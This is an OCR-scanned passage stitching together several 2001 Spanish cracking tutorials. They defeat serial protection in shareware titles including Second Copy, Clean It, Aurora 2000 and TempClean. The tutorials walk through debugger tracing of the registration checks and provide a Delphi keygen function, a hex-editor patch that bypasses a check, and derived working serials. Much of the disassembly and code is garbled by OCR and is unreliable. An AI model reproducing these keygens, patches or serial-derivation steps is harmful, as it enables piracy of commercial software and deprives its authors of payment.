entramos en la call de la generación del serial podemos ver HB, HB2, HB3, HB4, SR, vemos la evolución del 
programa y que las rutinas de generación están enlazadas). Recuerden que es mejor un serial que un parche o 
que un loader pues con un serial podemos ingresarlo una y otra vez si el autor del programa no lo cambia, 

ero tenemos que estar creando un parche para cada nueva versión del programa al no tener este y eso nos 
he más difícil la vida. 


Asi tambien quiero invitarlos a que puedan considerar otras herramientas, como por ejemplo, el ScAEvoLa's 
PatchEngine v1.33, Topo, VeoVeo (para activar las casillas deshabilitadas), ya que este es un programa que 
se presta para muchas cosas. 


Eso es todo, ahora ya hemos generado nuestro propio serial o nuestro keygen, antes que nada no está demás 
decirles que 


"Si les gusta el programa paguen por él" 
No me responsabilizo por el mal uso de este tutorial, el fin principal es "Aprender Más". 


Un saludo para Karpoff, CaoS_Reptante, Profesor X y a todos los crackers hispanohablantes. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 1999-2001 
Second Copy 6.0 


PROTECCION: Serial 

Objetivo: Obtener un serial válido. 

Descripcion: 299222297 

Dificultad: INICIADO 

DOWNLOAD: 2299997 

Herramientas: Softice 

CRACKER: MrRidk FECHA: 18/11/2001 


INTRODUCCION 


Wenassssssssssss !!!, cuanto tiempo sin escribir ni un solo tutorial :). Esta vez vuelvo a la carga con una proteccion 
que a mi me ha resultado ' curiosa ', pero todo a su tiempo ;-)... Como siempre si tienes alguna duda, mandame un 


e-mail a: ridkG+hotmail. com 


AL ATAKE 


Weno, weno, weno .. pues como ya dije el algoritmo de generacion del serial del programa, es un tanto ' curioso ', y te 
preguntaras .. pq ?, pues pq para generar el serial, se basa ademas de en el nombre en el propio serial. El serial se divide en 
2 partes... 


La primera se usa para generar la segunda ... de la siguiente forma .. 


Se genera un numero de 4 digitos ( en hexadecimal ). Ese numero ya pasado a string se situa delante del nombre. Y tras 
hacer un bucle conseguimos el resto del serial .. el cual sera un numero hexadecimal, que dejaremos tal cual se vea .. 
dividiendolo por la mitad con un *-*, Quedando asi el tipo de serial XXXX-BBBB-BBBB, siendo las XXXX la primera parte y las 
BBBB-BBBB el resto del serial ( el calculado ). Asi pues para genera el serial, el bucle lo realiza con esos 4 digitos mas el 
nombre pasado a mayusculas ( XXXX+NombreENMaysucuas). 


Bien empezemos con el meollo de la cuestion .. para empezar ejecutamos el programa... y le damos a la opcion de introducir 
serial .. tras esto nos aparece una ventana pidiendo nombre y key ... Ejecutamos nuestro adorable soft-ice y ponemos los 
breakpoints reglamentarios ( bpx GetWindowTextA; Bpx GetDlgltemTextA, Bpx HMemcpy ). 


En esta ocasion salta el HMemcpy .. asi que damos F12 hasta conseguir entrar en el codigo del programa .. una vez alli 
vamos traceando a lo largo de un buen numero de ret's, hasta que veamos codigo seguido, es decir sin un ret 5 instrucciones 
mas para abajo. 


Ahora toca tracear con F8, durante un BUEN rato ;-). Buscando lugares donde se acceda a la info del nombre, 
multiplicaciones .. etc. 


Bien el algoritmo tiene tres puntos clave ... el primero se trata de comprobar si los 4 primeros caracteres del serial son 'X' y 
en tal caso pasarlas a '0"...esto lo hace asi .. 


:004A547D 8B45F8 mov eax, dword ptr [ebp-08] // Cogemos caracter 

:004A5480 807C18FF58 cmp byte ptr [eax+ebx-01], 58 // Miramos si es 'X' = 58h 
:004A5485 750D ¡ne 00445494 // Sino es saltamos 

:004A5487 8D45F8 lea eax, dword ptr [ebp-08] 

:004A548A ES859ECF5FF call 004040E8 

:004A548F C64418FF30 mov [eax+ebx-01], 30 // Pero si es una 'X' ponemos un '0' = 30h 


En la 22 parte ... se trata de pasar el nombre a mayusculas .. para ello comprueba si esta en 'a' y 'Z' y si es asi la eleva a 
mayusculas ... Lo hace de esta manera ... 


:00408975 8A02 mov al, byte ptr [edx] // Coge caracter 
:00408977 3C61 cmp al, 61 

:00408979 7206 jb 00408981 // entre 'a' ... 

:0040897B 3C7A cmp al, 7A 

:0040897D 7702 ja 00408981 // ... y 'Z 

:0040897F 2C20 sub al, 20 // de ser asi .. le pasa a mayusculas 


Y la tercera parte es la propia de generacion el serial ... y es esta .. 


:004A55E5 8A4410FF mov al, byte ptr [eax+edx-01] // Cogemos caracteres 

:004A55E9 3C20 cmp al, 20 // Miramos que no sea un espacio en blanco 

:004A55EB 750€ jne 004A55F9 

:004A55ED 648F0500000000 pop dword ptr fs:[O00000000] 

:004A55F4 83C408 add esp, 00000008 

:004A55F7 EB2E ¡mp 00445627 

:004A55F9 8B55FC mov edx, dword ptr [ebp-04] 

:004A55FC 8B4DF4 mov ecx, dword ptr [ebp-0C] 

:004A55FF 25FFO00000 and eax, OOOOOOFF 

:004A5604 F7EB imul ebx // Multiplicamos el valor del caracter por el contenido de ebx ( en principio = 14DAFHh ) 
:004A5606 030520B94C00 add eax, dword ptr [004CB920] // Sumamos ese valor al valor que salio en la pasada anterior del 
bucle .. 

:004A560C 8BD8 mov ebx, eax // Ponemos en ebx el valor que hemos calculado .. para usarlo en la siguiente pasada 
:004A560E 33C0 xor eax, eax // Borramos eax 

:004A5610 5A pop edx 

:004A5611 59 pop ecx 

:004A5612 59 pop ecx 

:004A5613 648910 mov dword ptr fs:[eax], edx 

:004A5616 EBOF ¡mp 00445627 

:004A5618 E9BFDDF5FF jmp 004033DC 

:004A561D BBE7030000 mov ebx, 000003E7 

:004A5622 ES11E1F5FF call 00403738 

:004A5627 FF45F4 inc [ebp-0C] 

:004A562A FF4DE8 dec [ebp-18] 

:004A562D 75A2 ¡ne 004A55D1 // Si aun no hemos acabdo volvemos arriba. 


Weno pues eso era todo .. no es demasiado dificil verda ? ;P 


Bien ahora toca elaborar el keygen, usaremos delphi para esta labor ;P. Ahora pensemos .. tenemos 2 opciones .. que los 4 
primeros numeros del serial sean fijos.. o bien que sean aleatorios .. Yo voy a usar la 22 opcion ;). 


Un posible codigo del serial seria el siguiente ... 


function calculanombre(Nombre2 : string) : String; 
var 

Ebx, Ecx, Esi, Edx,Esi2: Dword; 

i: Integer; 

Texto : String; 

Temp : Integer; 

begin 

Temp := Random(65535); 

Texto := IntToHex(Temp, 4) +UPPERCASE(Nombre2); 
Esi := $14DAF; 

Esi2 := $14DAF; 

For | := 1 to Length(Texto) do begin 

If Texto[i] <> ' ' then begin 

Ebx := Ord(Texto[! 1); 

Edx := Ebx * Esi; 

Ecx := Edx + Esi2; 

Esi := Ecx; 

end; 

end; 

Result := | ntToHex(Temp, 4) +*-'+Copy(l| ntToHex(Esi,8), 1,4) +*-'+Copy(I ntToHex(Esi, 8),5,4); 
end; 


Y esto es todo .. no ha sido muy dificil , verdad ? ;-). Como siempre si algo no esta claro o teneis sugerencias, criticas etc .. 


mandadme un mail a: ridkfhotmail. com 
[FINALIZANDO 


Weno gente, pues esto es todo por ahora .. un saludo para toda la gente de ECC [Extreme Computing Corel. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 


Todos 


los de Skylark Utilities 


Name / Serial, Limitación de Tiempo 


Encontrar un serial 


válido 


Algunas buenas util 
LE 


Aficionado. 


lerías, en lo personal me gustan Find It y Part 


Victimas aqui > http://www.skylarkutilities.com 


Softice, W32dasm 


ByTESCRK 


FECHA: 13/10/2001 


INTRODUCCION 


Ok, en este Octavo tuto, vamos a escoger a una de las victimas, yo he escogido, Clean It v3.02 bastante 
nuevo, su última versión es del 05 de Octubre de 2,001. 


Este programa fué hace ya como año y medio FREEWARE, en sus primeras versiones, luego pasó a ser 
SHAREWARE, con un precio de $14.95, en lo personal considero que es mucho valor para lo que hace, hay 
algunos otros que limpian más cosas y dan menos problemas, por ejemplo, la victima que he cedido a mi 
buen amigo CaoS ReptantE en su tuto sobre "Parche Inteligentes" es uno de los mejores en su género. Pero 
bueno cada uno le pone un precio a las cosas y el autor de este programa no iba a ser la excepción, sin 
embargo, en mi caso hubiese preferido que fuera siempre FREEWARE. 


Pero pongámonos prestos y dispuestos y vayámonos... 


AL ATAKE 


De acuerdo ya que tenemos a nuestra victima descargada e instalada, la ejecutamos y nos vamos a Help > Register Info 
> Enter Keycode... rellenamos las cajas de texto y clic en Register y... nos da el mensaje de error 


Today just doesn't seem to be your day! 
The Name and/or KeyCode entered is invalid! 


Salimos y vamos a desensamblarla con W32DASM, vemos en las Reference Strings por el error y 
llegamos a 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040A35E(C) <= Investigamos aqui... 


:0040A3D8 8B560C mov edx, dword ptr [esi+0C] 
:0040A3DB 6430 push 00000030 


* Possible StringData Ref from Data Obj ->"Registration Failed" 


| 
:0040A3DD 68FC764100 push 004176FC 


* Possible StringData Ref from Data Obj ->"Today just doesn't seem to be your day!" 


:0040A3E2 6844764100 push 004176A4 
:0040A3E7 52 push edx 


* Reference To: USER32.MessageBoxA, Ord:01BEh 


:0040A3E8 FF15B4424100 Call dword ptr [004142B4] 
:0040A3EE 8B460C mov eax, dword ptr [esi+0C] 
:0040A3F1 68810C0000 push 00000C81 

:0040A3F6 50 push eax 


Al ir a 0040A35E vemos esto... 


:0040A352 8BCF mov ecx, edi 

:0040A354 8BD8 mov ebx, eax 

:0040A356 E8E5000000 call 00404440 <= Vamos a entrar aqui... 
:0040A35B 3BC3 cmp eax, ebx <= Compara EAX y EBX 
:0040A35D 5B pop ebx 

:0040A35E 7578 jne 0040A3D8 <= Vamos al mensaje de error si no coinciden 
:0040A360 8B5638 mov edx, dword ptr [esi+38] 

:0040A363 8B4FE44 mov ecx, dword ptr [esi+44] 

:0040A366 83C128 add ecx, 00000028 

:0040A369 8B420C mov eax, dword ptr [edx+0C] 

:0040A36C 8D542418 lea edx, dword ptr [esp+18] 

:0040A370 50 push eax 

:0040A371 51 push ecx 


* Possible StringData Ref from Data Obj ->"Thank you %s for registering my " 
->"program %s and for helping to " 
->"support shareware." 


:0040A372 6828774100 push 00417728 
:0040A377 52 push edx 


Entrando en la llamada a 00404440 vemos que aqui es toda la creación y comparación de nuestro serial, si vemos en 
W32DASM, vemos que hay varios saltos a esta dirección o comprobaciones del serial correcto 


* Referenced by a CALL at Addresses: 
|:0040106A , :00401735 , :00404462 , :00408327 , :004083F2 
|:0040A356 


:0040A440 83EC18 sub esp, 00000018 

:0040A443 A17C774100 mov eax, dword ptr [0041777C] 
:0040A448 53 push ebx 

:0040A449 55 push ebp 

:0040A44A 56 push esi 

:0040A44B 8B31 mov esi, dword ptr [ecx] 

:0040444D 57 push edi 

:0040A44E 894C2418 mov dword ptr [esp+18], ecx 
:0040A452 8944241C mov dword ptr [esp+1C], eax 
:0040A456 8D7E28 lea edi, dword ptr [esi+28] 
:0040A459 83C9FE or ecx, FFFFFFFF 

:0040A45C 33C0 xor eax, eax 

:0040A45E 897C2424 mov dword ptr [esp+24], edi 
:00404462 E2 repnz 

:0040A463 AE scasb 

:0040A4464 F7D1 not ecx 

:0040A466 49 dec ecx 

:0040A467 33ED xor ebp, ebp 

:0040A469 8D5C241C lea ebx, dword ptr [esp+1C] <= Vemos el valor CLN y lo anotamos 
:0040A46D 894C2420 mov dword ptr [esp+20], ecx 
:0040A471 33FF xor edi, edi 

:0040A473 896C2410 mov dword ptr [esp+10], ebp 
:0040A4477 FF15D4404100 Call dword ptr [004140D4] 
:0040A47D 8BC8 mov ecx, eax 

:0040A47F 8A06 mov al, byte ptr [esi] 

:0040A481 84CO0 test al, al 

:0040A483 894C2414 mov dword ptr [esp+14], ecx 
:0040A487 7415 je 0040A49E 

:0040A489 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A48B 7411 je 0040A449E <= Vamos aqui... 


:0040A49E 8A16 mov dl, byte ptr [esi]. <= Caemos aqui 

:0040A4A0 46 inc esi 

:0040A4A1 SOFA2D cmp dl, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A4A4 740A je 0040A4BO <= Vamos aqui... 

:0040A4A6 SF pop edi 

:0040A4A7 SE pop esi 

:0040A4A8 5D pop ebp 

:0040A4A9 8BC1 mov eax, ecx 

:0040A4AB 5B pop ebx 

:0040A4AC 83C418 add esp, 00000018 

:0040A4AF C3 ret <= Aqui salimos... 

:004044B0 8A06 mov al, byte ptr [esi]. <= Caemos aqui 

:0040A4B2 8400 test al, al 

:0040A4B4 7436 je 0040A4EC 

:0040A4B6 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A4B8 7432 je 0040A4EC <= Vamos aqui... 


:0040A4EC 8A06 mov al, byte ptr [esi]_ <= Caemos aqui 

:0040A4FE 46 inc esi 

:0040A4EF 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A4F1 740A je 0040A4FD <= Vamos aqui... 


:0040A4FD 8A06 mov al, byte ptr [esi]_ <= Caemos aqui 

:0040A4FF 84CO0 test al, al 

:0040A501 7436 je 0040A539 

:0040A503 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A505 7432 je 0040A539 <= Vamos aqui... 


:0040A539 8A16 mov dl, byte ptr [esi]. <= Caemos aqui 

:0040A53B 46 inc esi 

:0040A53C S0FA2D cmp dl, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A53F 740A je 0040A54B <= Vamos aqui... 


:0040A54B 8A06 mov al, byte ptr [esi]. <= Caemos aqui 

:0040A54D 84CO0 test al, al 

:0040A54F 7442 je 0040A593 

:0040A551 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A553 743E je 0040A593 <= Vamos aqui... 


:0040A593 8B5C2420 mov ebx, dword ptr [esp+20] <= Aqui caemos 

:0040A597 8B 742424 mov esi, dword ptr [esp+24] 

:0040A59B 8B4C2418 mov ecx, dword ptr [esp+18] 

:D0040A59F 6A0O push 00000000 

:0040A5A1 53 push ebx 

:0040A5A2 56 push esi 

:0040A5A3 E888000000 call 00404630 <= Se genera la 1ra parte en HEX 

:0040A5A8 3BC7 cmp eax, edi <= Forzamos a EDI a comparar igual y anotamos el valor de EAX 

:0040ASAA 740C je 0O40A5B8 <= Vamos a 0040A5B8 

:0040ASAC 8B442414 mov eax, dword ptr [esp+14] 

:0040A5BO SF pop edi 

:0040A5B 1 SE pop esi 

:0040A5B2 5D pop ebp 

:0040A5B3 5B pop ebx 

:0040A5B4 83C418 add esp, 00000018 

:0040A5B7 C3 ret 

:0040A5B8 8B4C2418 mov ecx, dword ptr [esp+18] <= Aqui caemos... 

:0040A5BC 6A01 push 00000001 

:0040A5BE 53 push ebx 

:0040A5BF 56 push esi 

:0040A5C0 E86B000000 call 00404630 <= Se genera la 2da parte en HEX 

:0040A5C5 3BC5 cmp eax, ebpp <= Forzamos a EBP a comparar igual y anotamos el valor de EAX 

:0040A5C7 740C je 0040A5D5S <= Vamos a 0040A5D5 

:0040A5C9 8B442414 mov eax, dword ptr [esp+14] 

:0040A5CD 5F pop edi 

:0040A5CE SE pop esi 

:0040A5CF 5D pop ebp 

:0040A5DO0 5B pop ebx 

:0040A5D1 83C418 add esp, 00000018 

:0040A5D4 C3 ret 

:0040A5D5 3B5C2410 cmp ebx, dword ptr [esp+10] <= Compara que EBX sea igual a un byte en 

ESP+10 y lo anotamos 

:0040A5D9 740C je 0O040A5E7  <=Si es igual genera un número para comparar afuera y lo guarda 

en EAX 


:0040A5DB 8B442414 mov eax, dword ptr [esp+14] 
:0040A5DF S5F pop edi 

:0040A5EO0 SE pop esi 

:0040A5E1 5D pop ebp 

:0040A5E2 5B pop ebx 

:0040A5E3 83C418 add esp, 00000018 

:0040A5E6 C3 ret <= Sale y va a comparar 


Ahora tendremos nuestro serial escrito en nuestras notas, unamóslo todo y veamos que pasa, nos ha dado nuestro 
mensajito de Registration failed!, debemos recordar como llegamos a conseguir estos datos y fué por medio de 2D 
veamos que representa 2D en ASCII, al ver vemos que 2D en DEC es 45 y en ASCII representa al signo - o guión, 
entonces lo que se me ocurre es que separemos estos por medio de guiones el cual quedaría así... 


CLN-00000000-00000000-0 
Ahora presionamos Register y vemos... en mi caso 
"Thank you ByTESCRK for registering my program Clean It and for helping to support shareware." 


Este autor utiliza el mismo método de comparación para todos sus programas, lo único que deben tomar en cuenta son 
los primeros tres caracteres que varian para Clean It es CLN, Part It es PRT, Find It es FND, etc. 


Si no quieres irte forzando los valores AL y llegar hasta donde se generan los códigos, cambia con un editor 
hexadecimal en 0040A48B, escribe esto E903010000 y NOPea el resto, ¿qué cómo calculas los offset?, consiguete un 
programa de OPCodes, si quieres el que yo uso, enviame un email. 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera 
educacional y tambien como diversión, si ha USTED, le gusta el producto por favor COMPRELO, algunas 
veces... los autores merecen su dinero ;0)" 


Saludos a mis buenos amigos Karpoff, PrOfesor X, CaoS ReptantE y a todos los crackers hispanohablantes, en 
especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK QGiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 


Audora Scrren saver 


Serial 


Registrar con un serial valido 


Este es un screen saver.. hay varios en esa pagina .. TODOS SON IGUALES.. Lo que cambia es 
el numero contra el que ejecuta el XOR 


Novato 


http://www.coolscreens.com/aurora2000.exe 


Softice W32dsm89 Editor Hex.. 
SiLvEr StOrM FECHA: 18/11/2001 


INTRODUCCION 


Hola de nuevo, despues de varios meses sin hacer un tute aqui les va otro ..aqui vamos de nuevo pero esta vez 
a sacar el serial y ademas vamos a ver como genera este serial . espero que lo entiendan y les sea util. 


Recuerden que este tutorial esta hecho con fines netamente educativos si les interesa este Programa 


COMPREANLO. 


Aprovecho la oportunidad para condenar los actos terroristas ocurridos en E.Ú. así como para decirles 
a todas las personas que leen estos tutes, que sigamos unidos por vencer a la ignorancia, que no 
caigamos en los mismos errores de los demas, que unidos y todos con un mismo fin estaremos en la 
cuspide.. todos adelante.. seguimos aqui.. 


AL ATAKE 


Lo primero que hacemos es instalarlo... Luego dejan que se active el screen saver.. o le dan a TEST.. cuando se 
actica y se mueve el mouse nos sale la pantallita para registrarnos,, aqui es donde entramos nosotros. 


Ok... jeje aqui comienza la aventura. 
Ponemos un nombre y un serial cualquiera. por ejemplo:123456789 presionamos Cntrol+D i sice Salta 
ponemos un bpx hmemcpy (este bpx es casi universal :)) Salimos de sice con CONTROL + D. 


Le damos Ok. a la pantalla del serial y sice SALTA.. jeje que genial es hmemcpy... es mas dejenme decirles que 
en este screen saver si ponemos bpx dentro del programa cuando el programa abre asi pase por ese punto sice 
no salta.. solo le para a hmemcpy y luego que entra con ese si entra a los demas que pusimos... 


Desabilitamos los break points bd* 


F12 varias veces hasta que caigamos en nuestro codigo de aurora... que como lo sabemos por que en una linea 
verde del sice nos aparece ese nombre aurora en una de las ventanitas :-). 


Empezamos a tracear con £10 hasta que llegamos a la adireccion 4550b3 *esta call apunta a un api de windows.. 
SLEEP... esto es para detener el proceso por un rato....es como un spera un momento y continua. 


Sigue presionando f10 


* Reference To: kernel32.Sleep, Ord: 0000h 
l 


:004550B3 ESG6COFFEBFF Call 00406024 

:004550B8 8D55F8 lea edx, dword ptr [ebp-08] 
:004550BB S8B83E38020000 mov eax, dword ptr [ebx+00000ZE8S] 
:004550C1 ES2636FDFF call 004286EC 

:004550C6 8B45F8 mov eax, dword ptr [ebp-08] 
:D004550C9 50 push eax 

:004550CA 8D55F4 lea edx, dword ptr [ebp-0C] 
:004550CD 8B3S3E4020000 mov eax, dword ptr [ebx+000002ZE4] 
:004550D3 ES1436FDFF call 004286EC 

:004550D8 8B45F4 mov eax, dword ptr [ebp-0C] 
:004550DB 5A pop edx Call sospechoso 
:004550DC ES973SFFFF call 00448978 


entramos aqui con f8 


* Referenced by a (Ujnconditional or (C)jonditional Jump at Addresses: 
1:004550981/C), :004550AC(C) 
| 


:004550El A1FC7?C4500 mov eax, dword ptr [00457CFC] 
:004550E6 803800 cmp byte ptr [eax], 00 
:004550E9 0OFS515010000 jne 00455204 

:D04550EF 6880524500 push 00455280 


ENTRAMOS EN ESE CALL... con FS 


De aqui en edelante observen bien cada una de las instrucciones. 


EiX=D06FES575 EBX=0"75BCD15 ECXx=00000001 EDX=00 CAS ESI=D006FE1A24 


EDI=D006FE124 EBP=006FES57C ESP=006FES55 EIP=004489D”7 odiIlsza 


D3=02 47 E 21 S=6127 G5=0000 


023F:004489D2 CALL 00403140 ES 
(023F:004489D7 CMP_ DWORD PTR [EBP-0c],00 | en el otro regisito el codigo que metimos 
023F:004489DB  JNZ 002248923 ' ] y tambien valida que no venga vacio ni el 
23F:004489DD CMP DWORD PTR [EBP-04],00 "x nombre nielcodigo : rror y no 
3F:004459E1l  —JNZ 004459EC 
D23F:004459E3 MO BYTE PTR [004579F8] ,01—4— 
:0049459E4  —JMP 00445154 
DO23F:004459EC MOV , [EBP-04] 
:004489EF CALL 00403C2 
:004459F4 
:004459F6 
:004459F5 


ne nuestro 


:004489FA Pone en EX el 
-004489FF MOV ECX, 00010000 ——— Pone enE 0000 [HE ) [decimal] 
:00448404 SUB ECX,EAX > resta a ECX lo que tenga E4X-- aqui 10000 - 1=FFFF 
-00448406 MOV ESI, [EBP-04] ————- Mueve aESI lo que lleva EBP-04....Nuestro Nombre 


ESI,BYTE PTR [EAX+ESI-01] 


Hasta aqui creo que bamos claros.... espero.. creo.. digo.. :-) 


O23F:004451409 MOVZX ESI,BYTE PTR [El2Xx+ES1I1-01] 
O23F:00494540E —IMUL ECX,ESI 
O23F:00445411 ADD [004579FC] ,ECX 


En la direccion 00448A09 Saca de nuestro nombre el siguiente caracter. Y le aplica un IMUL a ese carcater que 
saco y deja el valor resultante en ECX, luego suma (ADD) en la direccion (004579FC) lo que tenemos en ECX ... 
NOTA AQUI ESTA GENERANDO EL NUMERO CONTRA EL CUAL MAS ADELANTE HACE EL XOR 
PARA GENERAR LA CLAVE. 


O23F:00445117”7 INC EAX 
023F:0044581185 DEC EDX 


O23F:004458119 JNZ 009459FF 


Incrementa EAX y Decremeta EDX y regresa para seguir calculando cada uno de los carcateres de nuestro 
nombre .. osea se repite el loop desde 004489ff hasta que EAX valga el total de caracteres de nuestro nombre y 
EDX valga 0.. AQUI GENERO EN la posicion de memoria 004579FC .. EL NUMERO QUE LES MENCIONE. 


Aqui est la parte interesante :) 


023F:00448A41B MOV 
O23F:0044581420 XOR 


E2AX, [00457400] 
[004579FC] ,EAX 


En 448A1B. Pone en EAX Lo que trae en la direccion [00457A00] ah.. si... cierto... que como se que cuanto trae 
ahi... bueno si miran en sice cuando estamos parados sobre la linea en la parte de arriba veran ese registro 
cuanto trae en hexadecimal. AHH. Este valor que trae es fijo nunca cambia (aqui es donde cambia para cada 
uno de los programas que esta casa hace). 


GS=0000 
ESI,BYTE PTR [EAX+ESI-01] 
ECX,ESI qe 
[0094579FC] ,ECX AQUÍ YEMOS QUE 0045400 ES IGUAL 4 0D5403D5 EN 
-00448417 INC FAX L... RECUERDEN QUE ESTE N O 
:00448 j DEC EDX 
023F:00448419  JNZ 004489FF 
023F:00445811B MOV EAX, [00457100] 
023F:00448420 XOR [004579FC] ,EAX 


EBX=07?5BCD15 ECX=004CFC64 
EBP=006FES7C ESP=D006FES55 EIP=00445120 
F35=6127 G5=D000 (Ds :00457 


ESI,BYTE PTR asi 


IMUL ECX,ESI 
:004 ADD [004579FC] ,ECX OMO LES DE 
:004 ? INC EAX JE EA IN LO QUE TIENE EN 
-004 8 DEC EDX 004579FC] Y RESULTADO LO 
:004 9 JNZ 004489FF 

MOV EAX, [00457400] 

[004579FC] ,EAX 

:00448126 DWORD PTR [(004579FC],0145C52E 
:00448430 0044843C 
:004 32 DWORD PTR [004579FC],D145C52E 
:004 E EBX, [004579FC] 
:00448142 0044814D 
:00448144 BYTE PTR [004579F8],00 
:00445149B 004458154 
:0044814D BYTE PTR [004579F8],01 


Ok lo que les decia anoten el numero que les aparece arriba en HEXADECIMAL y lo llevam a DECIMAL... 
pues ese es nuestro NUMERO MAGICO... tambien puede en sice poner ? y el numero y sice se lo combierte a 
decimal. 


Por ejemplo ?56FAA24 y saldra 91204132. 

RECUERDEN VER EL NUMERO DESPUES DE APRETAR F10 SOBRE EL XOR.. ese es el correcto. 

En la 448a26 compra que el numero que nos dio sea mayor que 0145C52E (21349678) si es menor no salta y le 
suma al numero que nos dio ese valor osea le suma al numero que genero en decimal + 21349678.. tengan en 
cuenta las comberciones en decimal y hexadecimal .. y ese serial el codigo secreto.. Si es mayor que esa cantidad 


entonces salta y nos deja esa cantidad como nuestro serial. 


Esta condicion se cumpliria si pusieramos un nombre de 1 letra o algo asi... por lo tanto al poner nuestro 
nombre deberia pasar sin hacer esta suma. 


Luego en 448A42.. aqui hace la comparacion.. en EBX tenemos lo que pusimos como serial falso ? EBX y 
veremos lo que pusimos y en [004579FC] tenemos el serial verdadero... .. sin son iguales no salta y pone en en el 
primer byte de [004579f8] el valor de 00 y el programa quedaria registrado .. si son diferentes pone 01 y el 
programa no se registra... 


Bueno amigos.. por cierto.. el programa graba en el directorio Windows en el Archivo control.ini el usuario y la 
clave si lo borran.. OJO no borren el archivo... Solo la linea donde esta el registro del screen saver... podran 
comenzar de nuevo.. 


Aurora 2000 


Congratulations! 

Thank you for purchasing £urora 2000. 

Please save your personal registration information. 

Name: SiLwEr StOrkd 

Key Code: 138111473 

If pou upgrade your system or get a new hard drive, 

you may need to reinstall and enter the above information. 


jeje :-) Programa crackeado.. y nuestro conocimiento apmpliado y actualizado.. espero que les quede claro. 


nO0TAS 


Cualquier error por favor pido disculpas, y si lo ven por favor me lo dicen, para corregirlo.. recuerden que soy 
humano y por lo tanto no soy perfecto.. (:-)) y no quiero serlo tampoco... 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor X 

Tahkahozangel.. (Buen programado de ASM - Thanks Friend) 

Mr. Silver(Black Fennix). 

KuaTo 

Vlugo, Caos Raptante.. Etc.. y a todos .. no camben en esta lista... son muchos.. 
GRACIAS A TODOS.. 


+ Toda la gente de TUTORIALES2000-GT2-TNT-ECC-TRIAD. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Chotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 
TempClean v3.04 


Name / Serial, Limitación de Tiempo 
Hacer un Keygen 

Ver introducción 

Novato. 


http://alvilim.virtualave.net 


TRW2000, W32dasm 


ByTESCRK FECHA: 02/10/2001 


INTRODUCCION 


En Windows 9x/N'T muchos programas usan archivos temporalmente los cuales se quedan muchas veces 
después de usar el programa. Es por esto que el espacio en el disco duro decrece y el sistema empieza a dar 
problemas de rendimiento y comunmente disminuye o su sistema puede colgarse de vez en cuando por falta 
de espacio para el swapfile. 


TempClean limpia los directorios temporales o busca por estos archivos en su disco duro, usted no necesita 
pensar que puede enviar a su papelera de reciclaje. Puede personalizar fácilmente WINDOWS/TEMP, Caché 
de Internet, Historial de Mis Documentos o cualquier otro directorio que quiera que TempClean limpie, 
tambien puede personalizarlo para que lo haga al iniciar Windows usted no necesitará estar recordando. 


AL ATAKE 


Primeramente lo que haremos es analizar el terreno, si ya tenemos instalado el programa nos vamos a cargarlo, nos 
damos cuenta que al cargarlo aparece en una ventana principal y tenemos un botón de "Register", hacemos clic en él y 
automáticamente nos aparece otra ventanita en dónde nos pide un Registration name y un Registration key, ingresamos 
uno cualquiera en mi caso 


Registration name = ByTESCRK 
Registration key = 12345 


Y nos dice "Invalid registration key!" Abrimos el W32DASM y buscamos en las Reference Strings esa frase, al 
encontrarla y hacer doble clic en ella vemos esto... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:005636C3(C) 


:005636E6 8D55F8 lea edx, dword ptr [ebp-08] 

:005636E9 8B83DC020000 mov eax, dword ptr [ebx+000002DC] 
:005636EF E86089FCFF call 0052C054 

:005636F4 8B4DF8 mov ecx, dword ptr [ebp-08] 

:005636F7 8B55FC mov edx, dword ptr [ebp-04] 

:005636FA 8BC3 mov eax, ebx 

:005636FC E8F3000000 call 005637F4 <= Entramos aqui 
:00563701 84CO0 test al, al 

:00563703 7419 je 0056371E 

:00563705 8B4DF8 mov ecx, dword ptr [ebp-08] 

:00563708 8B55FC mov edx, dword ptr [ebp-04] 

:0056370B 8BC3 mov eax, ebx 

:0056370D E826020000 call 00563938 

:00563712 C7833402000001000000 mov dword ptr [ebx+00000234], 00000001 
:0056371C EBI1F jmp 0056373D 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00563703(C) 


:0056371E 6A00 push 00000000 
:00563720 668B0D7C375600 mov cx, word ptr [0056377C] 
:00563727 B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Invalid registration key!" 


:00563729 B8D8375600 mov eax, 005637D8 <= Aqui caemos, investigamos hacia arriba 
:0056372E E815B3FEFF call 0054EA48 
:00563733 C7833402000002000000 mov dword ptr [ebx+00000234], 00000002 


